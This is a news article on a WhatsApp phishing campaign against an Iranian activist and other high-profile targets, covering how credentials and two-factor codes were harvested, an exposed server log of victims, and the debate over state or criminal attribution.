The campaign came into public view after Nariman Gharib, a U.K.-based Iranian activist, disclosed receiving a suspicious WhatsApp message containing a link that appeared to reference a virtual meeting. Gharib, who closely monitors the digital dimensions of Iran’s protest movement, warned others not to click on such links and shared evidence of the attempt online.
Soon after, he provided the full phishing link and technical notes to TechCrunch, allowing reporters and independent security researchers to examine the infrastructure behind the attack. Their analysis revealed a sophisticated phishing operation designed not only to steal account credentials but also to enable real-time surveillance of victims’ devices.
The disclosure came at a sensitive moment: Iran is experiencing its longest nationwide internet shutdown, imposed as protests and violent crackdowns continue. In such an environment, secure digital communication has become both more vital and more vulnerable.
Inside the Attack Chain
According to the technical analysis, the WhatsApp message sent to Gharib directed targets to a phishing site that relied on DuckDNS, a dynamic DNS service often used to mask the true location of servers. The technique allowed attackers to generate links that appeared benign while redirecting victims to malicious pages hosted elsewhere.
The phishing infrastructure was ultimately traced to a domain registered in early November 2025. Related domains followed naming patterns that suggested the attackers were also impersonating providers of virtual meeting services, broadening the scope of potential lures. Investigators believe the DuckDNS layer helped disguise the phishing links as legitimate WhatsApp-related resources.
While the phishing page itself no longer loads, examination of its source code offered insight into how the attack functioned. Depending on the target, victims were presented with fake Gmail login pages or prompted to enter phone numbers, initiating a step-by-step process to harvest passwords and two-factor authentication codes.
Credentials, Surveillance and an Exposed Server
One of the most striking findings was a flaw on the attackers’ own servers. By modifying the phishing page’s URL, researchers were able to access an exposed file that logged victim submissions in real time. The file contained more than 850 records, including usernames, passwords, failed login attempts and two-factor codes—effectively operating as a keylogger.
The data revealed dozens of compromised victims, among them a Middle Eastern academic specialising in national security, a senior Lebanese cabinet minister, the head of an Israeli drone manufacturer, journalists and individuals based in or connected to the United States. The logs showed that the campaign targeted users across Windows, macOS, iPhone and Android devices.
Beyond credential theft, the phishing code also enabled device-level surveillance. Security researcher Runa Sandvik, who reviewed the code, found that the page requested access to a victim’s location, microphone and camera. If granted, the browser would transmit coordinates every few seconds and periodically capture audio and images—though investigators did not observe such media stored on the exposed server.
In parallel, some targets were shown WhatsApp-themed pages displaying QR codes. Scanning the code could silently link a victim’s WhatsApp account to an attacker-controlled device, a known technique that exploits the app’s multi-device feature and allows full access to messages and contacts.
Espionage, Cybercrime—or Both?
Attribution remains unresolved. The campaign’s narrow targeting, focus on high-value individuals and interest in surveillance data have led some experts to suggest a state-backed operation. Gary Miller of Citizen Lab said the activity bore “the hallmarks of an IRGC-linked spearphishing campaign,” referring to Iran’s Islamic Revolutionary Guard Corps, which has a history of targeted cyber operations.
Others caution that financial motives cannot be ruled out. Stolen Gmail credentials and two-factor codes could also be used to access cryptocurrency wallets, corporate email accounts or other monetisable assets. Domain analysis by DomainTools researcher Ian Campbell found the infrastructure consistent with medium- to high-risk cybercrime activity, noting that some domains predated the protests by several months.
Analysts also point to a hybrid possibility. Iran has previously outsourced cyber operations to criminal groups, a practice that can blur the line between espionage and profit-driven hacking while providing plausible deniability.
What is clear, researchers say, is that the campaign succeeded in compromising accounts and could re-emerge in another form. As digital repression intensifies alongside geopolitical conflict, the episode underscores a recurring lesson for at-risk communities: even a convincing message on a familiar platform can be a gateway to intrusion, surveillance and loss of control over one’s digital life.
About the author — Suvedita Nath is a science student with a growing interest in cybercrime and digital safety. She writes on online activity, cyber threats, and technology-driven risks. Her work focuses on clarity, accuracy, and public awareness.
